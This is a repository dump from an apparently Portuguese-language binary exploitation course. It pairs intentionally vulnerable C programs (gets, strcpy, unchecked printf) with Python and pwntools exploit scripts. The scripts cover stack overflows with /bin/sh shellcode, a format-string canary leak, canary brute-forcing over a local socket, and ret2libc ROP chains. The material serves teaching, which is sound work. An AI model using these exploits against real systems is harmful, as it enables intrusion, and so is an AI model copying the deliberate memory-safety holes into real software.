├── .github └── FUNDING.yml ├── README.md ├── aula_00 ├── prog └── prog.c ├── aula_01 ├── prog1 ├── prog1.c └── prog1_x32 ├── aula_02 ├── exp ├── exploit.py ├── prog2 └── prog2.c ├── aula_03 ├── exp ├── exploit.py ├── prog3 └── prog3.c ├── aula_04 ├── exp ├── exploit.py ├── prog4 └── prog4.c ├── aula_05 ├── exp ├── exploit.py ├── prog5 └── prog5.c ├── aula_06 ├── exp ├── exploit.py ├── pattern │ ├── README.md │ ├── git.txt │ └── pattern.py ├── prog6 ├── prog6.c └── prog6_x64 ├── aula_07 ├── exp ├── exploit.py ├── prog07 ├── prog07.c └── prog07_x32 ├── aula_13 ├── aula_13 ├── aula_13.c └── exploit.py ├── aula_17 ├── exploit.py ├── prog_17 └── prog_17.c ├── aula_18 ├── exploit.py ├── format ├── format.c ├── payload ├── prog_18 └── prog_18.c ├── aula_19 ├── aula_19 ├── brute_canary.py └── peda-session-aula_19.txt ├── aula_20 ├── exp ├── exploit.py ├── prog_20 └── prog_20.c ├── aula_21-1 ├── aula_21 ├── aula_21.c ├── exploit.py └── payload └── aula_22 ├── aula_22 ├── aula_22.c ├── exploit.py └── payload /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | custom: ['https://apoia.se/mentebinaria'] 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ceb 2 | Repositório do Curso de Exploração de Binários 3 | -------------------------------------------------------------------------------- /aula_00/prog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_00/prog -------------------------------------------------------------------------------- /aula_00/prog.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void func(void){ 4 | 5 | char c[] = "AAAA"; 6 | int i = 10; 7 | 8 | } 9 | 10 | 11 | int main(void){ 12 | 13 | func(); 14 | 15 | return 0; 16 | 17 | } 18 | -------------------------------------------------------------------------------- /aula_01/prog1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_01/prog1 -------------------------------------------------------------------------------- /aula_01/prog1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | void func(void){ 6 | 7 | int n = 10; 8 | int n2 = 11; 9 | int sum = n + n2; 10 | char *a = "AAAAAAAA"; 11 | char *b = "BBBBBBBB"; 12 | char d[80]; 13 | char e[80]; 14 | strcpy(d,a); 15 | strcpy(e,b); 16 | } 17 | 18 | int main(int arg, char *argv[]){ 19 | 20 | char c[40]; 21 | 22 | strcpy(c,argv[1]); 23 | 24 | printf("Escrevemos: %s\n", c); 25 | 26 | func(); 27 | 28 | return 0; 29 | 30 | } 31 | -------------------------------------------------------------------------------- /aula_01/prog1_x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_01/prog1_x32 -------------------------------------------------------------------------------- /aula_02/exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_02/exp -------------------------------------------------------------------------------- /aula_02/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | junk = "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG" 4 | 5 | esp = struct.pack(" 2 | #include 3 | 4 | 5 | void vuln(void){ 6 | 7 | char c[40]; 8 | 9 | puts("Me alimente: "); 10 | 11 | gets(c); 12 | 13 | printf("Vc escreveu: %s\n", c); 14 | 15 | } 16 | 17 | int main(void){ 18 | 19 | vuln(); 20 | 21 | return 0; 22 | 23 | } 24 | -------------------------------------------------------------------------------- /aula_03/exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_03/exp -------------------------------------------------------------------------------- /aula_03/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | junk = "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG" 4 | 5 | esp = struct.pack(" 2 | #include 3 | 4 | 5 | void vuln(void){ 6 | 7 | char c[40]; 8 | 9 | puts("Me alimente: "); 10 | 11 | gets(c); 12 | 13 | printf("Vc escreveu: %s\n", c); 14 | 15 | } 16 | 17 | int main(void){ 18 | 19 | vuln(); 20 | 21 | return 0; 22 | 23 | } 24 | -------------------------------------------------------------------------------- /aula_04/exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_04/exp -------------------------------------------------------------------------------- /aula_04/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | padding = "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG" 4 | 5 | addr = 0x7fffffffe470+50 6 | 7 | ret = struct.pack(' 2 | #include 3 | 4 | 5 | void vuln(void){ 6 | 7 | char c[40]; 8 | 9 | puts("Me alimente: "); 10 | 11 | gets(c); 12 | 13 | printf("Vc escreveu: %s\n", c); 14 | 15 | } 16 | 17 | int main(void){ 18 | 19 | vuln(); 20 | 21 | return 0; 22 | 23 | } 24 | -------------------------------------------------------------------------------- /aula_05/exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_05/exp -------------------------------------------------------------------------------- /aula_05/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | ret = 0x40063c 4 | rip = 0x7fffffffe470+35 5 | 6 | shellcode = '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' 7 | 8 | buf = b'' 9 | buf += b'\x41' *88 10 | buf += struct.pack(' 2 | #include 3 | #include 4 | #include 5 | 6 | void vuln() 7 | { 8 | char buffer[64]; 9 | unsigned int ret; 10 | 11 | puts("Diga alguma coisa: "); 12 | 13 | gets(buffer); 14 | 15 | ret = __builtin_return_address(0); 16 | 17 | 18 | if((ret & 0xff000000) == 0xff000000) { 19 | printf("Voce sobrescreveu o endereco de retorno: (%p)\n", ret); 20 | _exit(1); 21 | } 22 | 23 | printf("Voce disse: %s\n", buffer); 24 | } 25 | 26 | int main(int argc, char **argv) 27 | { 28 | 29 | vuln(); 30 | 31 | } 32 | -------------------------------------------------------------------------------- /aula_06/exp: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB 2 | -------------------------------------------------------------------------------- /aula_06/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | 4 | junk = "A" *56 + "B" *6 5 | 6 | print junk 7 | -------------------------------------------------------------------------------- /aula_06/pattern/README.md: -------------------------------------------------------------------------------- 1 | # Pattern - a reimplementation of pattern\_create/pattern\_offset in Python 2 | Metasploit comes with multiple very convenient scripts and utilities. Among 3 | the most valuable for me are pattern_create and pattern_offset. I found it 4 | increasingly annoying that both have a relatively long startup time. 5 | 6 | So after I overheard one of my colleagues complaining about this as well, 7 | I quickly hacked together a Python version that basically does the same. 8 | ## Usage 9 | ``` 10 | $ ./pattern 11 | Usage: pattern (create | offset) 12 | ``` 13 | So, to create a 2048 byte pattern you run 14 | ``` 15 | $ ./pattern create 2048 16 | Aa0Aa1Aa2[...snip...]p7Cp8Cp9Cq0Cq1Cq 17 | ``` 18 | and it outputs a unique pattern of said length. To find an offset in the 19 | buffer, let's say f9Cg, you run 20 | ``` 21 | $ ./pattern offset f9Cg 22 | 1738 23 | ``` 24 | and the program returns the offset until the requested series. You can also 25 | look for memory values. The values need to be little-endian and prefixed 26 | with 0x: 27 | ``` 28 | $ ./pattern offset 0x67433966 29 | 1738 30 | ``` 31 | To make sure the program works as close to the Metasploit version as possible, 32 | the offset mode searches through a 8192 byte pattern, just like pattern_offset. 33 | If your pattern is longer than that, append the pattern length: 34 | ``` 35 | $ ./pattern offset 9Mc0 36 | Not found 37 | $ ./pattern offset 9Mc0 10000 38 | 9419 39 | ``` 40 | ## Todo 41 | - bad characters support for pattern creation 42 | - partial matches 43 | 44 | -------------------------------------------------------------------------------- /aula_06/pattern/git.txt: -------------------------------------------------------------------------------- 1 | https://github.com/ickerwx/pattern.git 2 | -------------------------------------------------------------------------------- /aula_06/pattern/pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import sys 3 | import struct 4 | 5 | 6 | def pattern_create(length): 7 | pattern = '' 8 | parts = ['A', 'a', '0'] 9 | while len(pattern) != length: 10 | pattern += parts[len(pattern) % 3] 11 | if len(pattern) % 3 == 0: 12 | parts[2] = chr(ord(parts[2]) + 1) 13 | if parts[2] > '9': 14 | parts[2] = '0' 15 | parts[1] = chr(ord(parts[1]) + 1) 16 | if parts[1] > 'z': 17 | parts[1] = 'a' 18 | parts[0] = chr(ord(parts[0]) + 1) 19 | if parts[0] > 'Z': 20 | parts[0] = 'A' 21 | return pattern 22 | 23 | 24 | def pattern_offset(value, buflen): 25 | if value.startswith('0x'): 26 | value = struct.pack(' ' % sys.argv[0] 36 | 37 | 38 | def main(): 39 | if len(sys.argv) < 3 or sys.argv[1].lower() not in ['create', 'offset']: 40 | print_help() 41 | sys.exit(255) 42 | 43 | command = sys.argv[1].lower() 44 | num_value = sys.argv[2] 45 | 46 | if command == 'create': 47 | print pattern_create(int(num_value)) 48 | else: 49 | if len(sys.argv) == 4: 50 | try: 51 | buflen = int(sys.argv[3]) 52 | except ValueError: 53 | print_help() 54 | sys.exit(254) 55 | else: 56 | buflen = 8192 57 | print pattern_offset(num_value, buflen) 58 | 59 | if __name__ == '__main__': 60 | main() 61 | 62 | -------------------------------------------------------------------------------- /aula_06/prog6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_06/prog6 -------------------------------------------------------------------------------- /aula_06/prog6.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void func(void){ 4 | char c[] = "AAAA"; 5 | char buffer[40]; 6 | 7 | gets(buffer); 8 | } 9 | 10 | int main(void){ 11 | func(); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /aula_06/prog6_x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_06/prog6_x64 -------------------------------------------------------------------------------- /aula_07/exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_07/exp -------------------------------------------------------------------------------- /aula_07/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | junk = "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG" 4 | 5 | esp = struct.pack(" 2 | #include 3 | 4 | 5 | void vuln(void){ 6 | 7 | char c[40]; 8 | 9 | puts("Me alimente: "); 10 | 11 | gets(c); 12 | 13 | printf("Vc escreveu: %s\n", c); 14 | 15 | } 16 | 17 | int main(void){ 18 | 19 | vuln(); 20 | 21 | return 0; 22 | 23 | } 24 | -------------------------------------------------------------------------------- /aula_07/prog07_x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_07/prog07_x32 -------------------------------------------------------------------------------- /aula_13/aula_13: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_13/aula_13 -------------------------------------------------------------------------------- /aula_13/aula_13.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | 4 | void vuln(void){ 5 | 6 | char c[80]; 7 | 8 | gets(c); 9 | 10 | } 11 | 12 | int main(void){ 13 | 14 | vuln(); 15 | 16 | 17 | return 0; 18 | 19 | } 20 | -------------------------------------------------------------------------------- /aula_13/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | buf = "" 4 | buf += "A"*88 #JUNK 5 | buf += struct.pack(" 2 | 3 | void vuln() { 4 | char buffer[160]; 5 | 6 | puts("What is your mame?"); 7 | gets(buffer); 8 | 9 | printf("Welcome: "); 10 | printf(buffer); 11 | 12 | puts("\nSay Something: "); 13 | gets(buffer); 14 | } 15 | 16 | int main() { 17 | vuln(); 18 | 19 | puts("Not this time"); 20 | 21 | return 1; 22 | } 23 | -------------------------------------------------------------------------------- /aula_18/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context(arch = 'amd64', os = 'linux', endian = 'little') 4 | 5 | #context.log_level = 'DEBUG' 6 | 7 | binary = ELF('prog_18') 8 | 9 | p = process('./prog_18') 10 | 11 | ###### STAGE 1 - LEAK CANARY COOKIE ###### 12 | 13 | format1 = "%27$lx" 14 | 15 | p.recvline() 16 | p.sendline(format1) 17 | 18 | leak = p.recvline()[8:].strip() 19 | 20 | canary_cookie = int(leak, 16) 21 | 22 | print("\n") 23 | 24 | log.success("Canary Value: " +hex(canary_cookie)) 25 | 26 | ###### END ###### 27 | 28 | 29 | ###### STAGE 2 - SENDING PAYLOAD ###### 30 | 31 | print ("\n") 32 | 33 | print (p.recvline()) 34 | 35 | esp = 0x7fffffffe4d0+200 36 | 37 | shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 38 | 39 | buf = "" 40 | buf += "A" * 168 #JUNK 41 | buf += p64(canary_cookie) #LEAKED CANARY COOKIE 42 | buf += "CCCCCCCC" #JUNK OVERWRITE RBP 43 | buf += p64(esp) #STACK PLACE 44 | buf += "\x90" *400 #NOPS 45 | buf += shellcode #EXEC /BIN/SH 46 | 47 | log.info("Sending payload [{}]" .format(buf)) 48 | 49 | print("\n") 50 | 51 | p.sendline(buf) 52 | 53 | p.interactive() 54 | 55 | ###### END ###### 56 | 57 | open("payload", "w").write('{}\n{}'.format( 58 | format1, 59 | buf 60 | )) 61 | 62 | 63 | -------------------------------------------------------------------------------- /aula_18/format: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_18/format -------------------------------------------------------------------------------- /aula_18/format.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void){ 4 | 5 | int a = 10; 6 | int b = 20; 7 | int c = 30; 8 | 9 | printf("Number: %3$d\n", a ,b, c); 10 | 11 | } 12 | 13 | -------------------------------------------------------------------------------- /aula_18/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_18/payload -------------------------------------------------------------------------------- /aula_18/prog_18: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_18/prog_18 -------------------------------------------------------------------------------- /aula_18/prog_18.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void vuln() { 4 | char buffer[160]; 5 | 6 | puts("What is your mame?"); 7 | gets(buffer); 8 | 9 | printf("Welcome: "); 10 | printf(buffer); 11 | 12 | puts("\nSay Something: "); 13 | gets(buffer); 14 | } 15 | 16 | int main() { 17 | vuln(); 18 | 19 | puts("Not this time"); 20 | 21 | return 1; 22 | } 23 | -------------------------------------------------------------------------------- /aula_19/aula_19: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_19/aula_19 -------------------------------------------------------------------------------- /aula_19/brute_canary.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from pwn import * 3 | 4 | 5 | context(arch = 'amd64', os = 'linux', endian = 'little') 6 | 7 | def send_payload(payload): 8 | s = remote('127.0.0.1', 1337) 9 | s.send_raw(payload) 10 | return s.recvall().decode('utf8') 11 | 12 | 13 | payload = b'davide' 14 | payload += b'\x41' * 1026 15 | 16 | 17 | def bruteforce(payload, bytes_number, start=0x0, stop=0xff, step=0x1): 18 | 19 | bytes_array = [] 20 | 21 | for i in range(0, bytes_number): 22 | for byte in range(start, stop + step, step): 23 | guessed_payload = payload 24 | 25 | if len(bytes_array): 26 | guessed_payload += ''.join([chr(v) for v in bytes_array]) 27 | 28 | guessed_payload += chr(byte) 29 | 30 | output = send_payload(guessed_payload) 31 | 32 | if 'Username found' in output: 33 | bytes_array.append(byte) 34 | log.debug('Found Byte: {}'.format(' '.join(['0x{:02x}'.format(b) for b in bytes_array]))) 35 | break 36 | # else: 37 | # pwn.log.debug('0x{:02x}: invalid'.format(byte)) 38 | # pass 39 | 40 | if byte == stop: 41 | log.error('Error on exploit') 42 | exit(1) 43 | 44 | time.sleep(0.01) 45 | 46 | return bytes_array 47 | 48 | 49 | canary = bruteforce(payload,8) 50 | 51 | 52 | for i in canary: 53 | canary_xor = int(i) ^ 0xd 54 | print('Canary Bytes: 0x{:02x}'.format(canary_xor)) 55 | 56 | print '' 57 | 58 | for i in canary: 59 | canary = int(i) 60 | print('Canary Bytes Not Xored: 0x{:02x}'.format(canary)) 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /aula_19/peda-session-aula_19.txt: -------------------------------------------------------------------------------- 1 | break * 0x000055a77e391c4c 2 | 3 | -------------------------------------------------------------------------------- /aula_20/exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_20/exp -------------------------------------------------------------------------------- /aula_20/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | 4 | shellcode = "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" 5 | 6 | buf = "" 7 | buf += "A" *52 #junk 8 | buf += struct.pack(' 2 | #include 3 | 4 | int main(int argc, char *argv[]){ 5 | 6 | char c[40]; 7 | 8 | strcpy(c, argv[1]); 9 | 10 | printf("You Wrote: %s\n", c); 11 | 12 | return 0; 13 | 14 | } 15 | 16 | -------------------------------------------------------------------------------- /aula_21-1/aula_21: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_21-1/aula_21 -------------------------------------------------------------------------------- /aula_21-1/aula_21.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void vuln(void){ 4 | char buffer[80]; 5 | puts("Feed me: "); 6 | gets(buffer); 7 | } 8 | 9 | int main(void){ 10 | vuln(); 11 | } 12 | 13 | -------------------------------------------------------------------------------- /aula_21-1/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context(arch = 'amd64', os = 'linux', endian = 'little') 5 | 6 | elf = ELF('aula_21') 7 | #context.log_level = 'DEBUG' 8 | 9 | plt_puts = 0x401030 10 | got_puts = 0x404018 11 | main = elf.symbols['main'] 12 | pop_rdi_ret = 0x4011cb 13 | 14 | log.success('pop rdi;ret: {}'.format(hex(pop_rdi_ret))) 15 | log.success('got.puts: {}'.format(hex(got_puts))) 16 | log.success('plt.puts: {}'.format(hex(plt_puts))) 17 | log.success('main: {}'.format(hex(main))) 18 | 19 | payload = '' 20 | payload += 'A' * 88 21 | payload += p64(pop_rdi_ret) 22 | payload += p64(got_puts) 23 | payload += p64(plt_puts) 24 | #payload += p64(main) 25 | 26 | f = open("payload","w") 27 | f.write(payload) 28 | 29 | p = process("./aula_21") 30 | p.recvline() 31 | p.sendline(payload) 32 | received = p.recvline() 33 | 34 | 35 | leaked_puts_got = received[:8].strip().ljust(8,'\x00') 36 | y = u64(leaked_puts_got) 37 | addrs = hex(y) 38 | leak = int(addrs,16) 39 | 40 | log.success('Leaked @GLIBC:' +hex(leak)) 41 | -------------------------------------------------------------------------------- /aula_21-1/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_21-1/payload -------------------------------------------------------------------------------- /aula_22/aula_22: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_22/aula_22 -------------------------------------------------------------------------------- /aula_22/aula_22.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void vuln(void){ 4 | char buffer[80]; 5 | puts("Feed me: "); 6 | gets(buffer); 7 | } 8 | 9 | int main(void){ 10 | vuln(); 11 | } 12 | 13 | 14 | -------------------------------------------------------------------------------- /aula_22/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context(arch = 'amd64', os = 'linux', endian = 'little') 5 | 6 | elf = ELF('aula_22') 7 | #context.log_level = 'DEBUG' 8 | 9 | ##########[STAGE 1]########## 10 | print('') 11 | log.info('[Stage One]') 12 | 13 | plt_puts = 0x401030 14 | got_puts = 0x404018 15 | main = elf.symbols['main'] 16 | pop_rdi_ret = 0x4011cb 17 | 18 | log.success('pop rdi;ret: {}'.format(hex(pop_rdi_ret))) 19 | log.success('got.puts: {}'.format(hex(got_puts))) 20 | log.success('plt.puts: {}'.format(hex(plt_puts))) 21 | log.success('main: {}'.format(hex(main))) 22 | 23 | payload = '' 24 | payload += 'A' * 88 25 | payload += p64(pop_rdi_ret) 26 | payload += p64(got_puts) 27 | payload += p64(plt_puts) 28 | payload += p64(main) 29 | 30 | f = open("payload","w") 31 | f.write(payload) 32 | 33 | p = process("./aula_22") 34 | p.recvline() 35 | p.sendline(payload) 36 | received = p.recvline() 37 | 38 | 39 | leaked_puts_got = received[:8].strip().ljust(8,'\x00') 40 | y = u64(leaked_puts_got) 41 | addrs = hex(y) 42 | leak = int(addrs,16) 43 | 44 | log.success('Leaked @GLIBC:' +hex(leak)) 45 | 46 | ##########[STAGE 2]########## 47 | print('') 48 | log.info('[Stage Two]') 49 | 50 | offset_bin_sh = 0x181519 #strings -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh" 51 | offset_system = 0x449c0 #readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system 52 | offset_puts = 0x71910 #readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts 53 | libc_base = leak - offset_puts 54 | 55 | system_addr = libc_base + offset_system 56 | bin_sh_addr = libc_base + offset_bin_sh 57 | 58 | payload = '' 59 | payload += 'A' * 88 60 | payload += p64(pop_rdi_ret) 61 | payload += p64(bin_sh_addr) 62 | payload += p64(system_addr) 63 | 64 | p.recvline() 65 | p.sendline(payload) 66 | p.interactive() 67 | 68 | 69 | 70 | 71 | -------------------------------------------------------------------------------- /aula_22/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mentebinaria/ceb/cbe038b3864bc717b1c8a8d08dfc9b15a2f584bc/aula_22/payload --------------------------------------------------------------------------------